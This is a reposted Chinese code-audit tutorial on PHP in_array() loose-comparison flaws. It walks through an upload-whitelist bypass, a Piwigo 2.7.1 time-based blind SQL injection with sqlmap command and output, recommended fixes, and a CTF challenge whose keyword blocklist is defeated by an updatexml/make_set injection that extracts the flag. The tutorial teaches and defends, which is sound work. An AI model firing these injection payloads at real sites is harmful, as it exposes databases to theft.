码上快乐

相关内容   简体   繁体

代码审计学习01-in_array() 函数缺陷

本文转载自  查看原文  2021-07-26 11:40  155    网络攻击防御体系/ 常见编程技术/ 网络安全体系建设

一、开始代码审计之旅 01

从今天起,学习代码审计了,这篇文章就叫代码审计01吧,题目来自 PHP SECURITY CALENDAR 2017 的第一题,结合 红日安全 写的文章,开始吧。

二、先看这道题目

1、题目名称:Wish List

2、in_array() 函数的作用

in_array() 函数的作用是判断第一参数是否存在第二个参数中,存在返回 true,不存在返回 false。需要注意的是,如果函数第三个参数为 true,则第一个参数必须还要和第二个参数同类型,函数才能返回 true。不写第三个参数,在一些情况下函数会发生强制转换,题目的漏洞就出在这里。

3、题目漏洞解析

if (in_array($this->file['name'], $this->whitelist)) { move_uploaded_file($this->file['tmp_name'], self::UPLOAD_DIRECTORY . $this->file['name']); }

in_array() 函数并只简单判断文件名是否存在白名单中,并没有将第三个参数设置为 true,攻击者可以上传一个 5backdoor.php 的文件,其文件名为 5backdoor,in_array() 函数将文件名强制转换为 5 ,符合 ranger(1,24) 的白名单条件,5backdoor.php 可以上传,于是一个任意文件上传漏洞就产生了。

4、in_array() 的扩展知识

in_array 的一段代码,可以明确看到非严格模式与严格模式下的区别:

<?php $array = array( 'egg' => true, 'cheese' => false, 'hair' => 765, 'goblins' => null, 'ogres' => 'no ogres allowed in this array' ); // Loose checking -- return values are in comments // First three make sense, last four do not var_dump(in_array(null, $array)); // true var_dump(in_array(false, $array)); // true var_dump(in_array(765, $array)); // true var_dump(in_array(763, $array)); // true var_dump(in_array('egg', $array)); // true var_dump(in_array('hhh', $array)); // true var_dump(in_array(array(), $array)); // true // Strict checking var_dump(in_array(null, $array, true)); // true var_dump(in_array(false, $array, true)); // true var_dump(in_array(765, $array, true)); // true var_dump(in_array(763, $array, true)); // false var_dump(in_array('egg', $array, true)); // false var_dump(in_array('hhh', $array, true)); // false var_dump(in_array(array(), $array, true)); // false ?>

三、结合一个案例

选取 piwigo2.7.1 内容管理系统的一个 SQL 注入漏洞来分析

1、漏洞原理分析

漏洞涉及文件:include/functions_rate.inc.phpinclude/config_default.inc.php,以及根目录下的picture.php

picture.php 关键代码:

if (isset($_GET['action'])) { switch ($_GET['action']) /*****************中间省略*********************/ case 'rate' : { include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php'); rate_picture($page['image_id'], $_POST['rate']); redirect($url_self); } /*****************中间省略*********************/ }

include/functions_rate.inc.php 关键代码:

function rate_picture($image_id, $rate) { global $conf, $user; if (!isset($rate) or !$conf['rate'] or !in_array($rate, $conf['rate_items'])) { return false; } /*****************中间省略*********************/ if ($user_anonymous) { $query.= ' AND anonymous_id = \''.$anonymous_id.'\''; } pwg_query($query); $query = ' INSERT INTO '.RATE_TABLE.' (user_id,anonymous_id,element_id,rate,date) VALUES (' .$user['id'].',' .'\''.$anonymous_id.'\',' .$image_id.',' .$rate .',NOW()) ;'; pwg_query($query); return update_rating_score($image_id); }

include/config_default.inc.php 关键代码:

$conf['rate_items'] = array(0,1,2,3,4,5);

通过上述代码分析,当参数 action=rate时会调用 include/functions_rate.inc.php 的 rate_picture($image_id, $rate) 函数,由于函数 in_array($rate, $conf['rate_items'])) 没有将第三个参数设置因为 true,检查不严格,导致变量 $rate 变量可控,将 $rate 设置为 1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 那么 SQL 语句就会变成:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (2,'192.168.2',1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

基于时间的 SQL 盲注就产生了。

2、漏洞证明

用 SQL 注入工具 sqlmap 证明漏洞,payload 如下:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

漏洞验证返回结果:

[20:45:34] [INFO] testing connection to the target URL sqlmap got a 302 redirect to 'http://192.168.203.131:80/piwigo/picture.php?/1/category/1'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: rate (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: rate=1 AND SLEEP(5) --- [20:45:37] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.4.45, Apache 2.4.23 back-end DBMS: MySQL >= 5.0.12 [20:45:37] [INFO] fetching database names [20:45:37] [INFO] fetching number of databases [20:45:37] [INFO] resumed: 5 [20:45:37] [INFO] resumed: information_schema [20:45:37] [INFO] resumed: mysq [20:45:37] [INFO] resumed: mysql [20:45:37] [INFO] resumed: performance_schema [20:45:37] [INFO] resumed: piwigo271 available databases [5]: [*] information_schema [*] mysq [*] mysql [*] performance_schema [*] piwigo271

3、修复建议

方法1:将 in_array() 函数的第三个参数设置为 true;

方法2:使用 intval() 函数将变量将转为数字;

方法3:使用正则表达式过滤,只限制为数字(官方修复是用这种方法)。

四、学习一道同类型的 CTF 题目

//index.php <?php include 'config.php'; $conn = new mysqli($servername, $username, $password, $dbname); if ($conn->connect_error) { die("连接失败: "); } $sql = "SELECT COUNT(*) FROM users"; $whitelist = array(); $result = $conn->query($sql); if($result->num_rows > 0){ $row = $result->fetch_assoc(); $whitelist = range(1, $row['COUNT(*)']); } $id = stop_hack($_GET['id']); $sql = "SELECT * FROM users WHERE id=$id"; if (!in_array($id, $whitelist)) { die("id $id is not in whitelist."); } $result = $conn->query($sql); if($result->num_rows > 0){ $row = $result->fetch_assoc(); echo "<center><table border='1'>"; foreach ($row as $key => $value) { echo "<tr><td><center>$key</center></td><br>"; echo "<td><center>$value</center></td></tr><br>"; } echo "</table></center>"; } else{ die($conn->error); } ?> 
//config.php <?php $servername = "localhost"; $username = "fire"; $password = "fire"; $dbname = "day1"; function stop_hack($value){ $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval"; $back_list = explode("|",$pattern); foreach($back_list as $hack){ if(preg_match("/$hack/i", $value)) die("$hack detected!"); } return $value; } ?> 
# CTF环境使用的sql语句 create database day1; use day1; create table users ( id int(6) unsigned auto_increment primary key, name varchar(20) not null, email varchar(30) not null, salary int(8) unsigned not null ); INSERT INTO users VALUES(1,'Lucia','Lucia@hongri.com',3000); INSERT INTO users VALUES(2,'Danny','Danny@hongri.com',4500); INSERT INTO users VALUES(3,'Alina','Alina@hongri.com',2700); INSERT INTO users VALUES(4,'Jameson','Jameson@hongri.com',10000); INSERT INTO users VALUES(5,'Allie','Allie@hongri.com',6000); create table flag(flag varchar(30) not null); INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');

stop_hack() 函数禁用了关键字和函数,看了这篇文章的解析,用 updatexml+make_set 这两个函数就可以成功拿到 flag,payload如下:

http://192.168.203.131/day1/index.php?id=1 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 PHP代码审计01之in_array()函数缺陷 代码审计学习之命令注入 PHPCMSV9版本代码审计学习 代码审计系列篇一之代码审计学习思路 PHP代码审计02之filter_var()函数缺陷 PHP代码审计学习之命令执行漏洞挖掘及防御 bluecms v1.6 sp1 代码审计学习 PHP审计之in_array函数缺陷绕过 【代码审计01】几种常见的漏洞种类以及代码审计工具 代码审计之create_function()函数
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM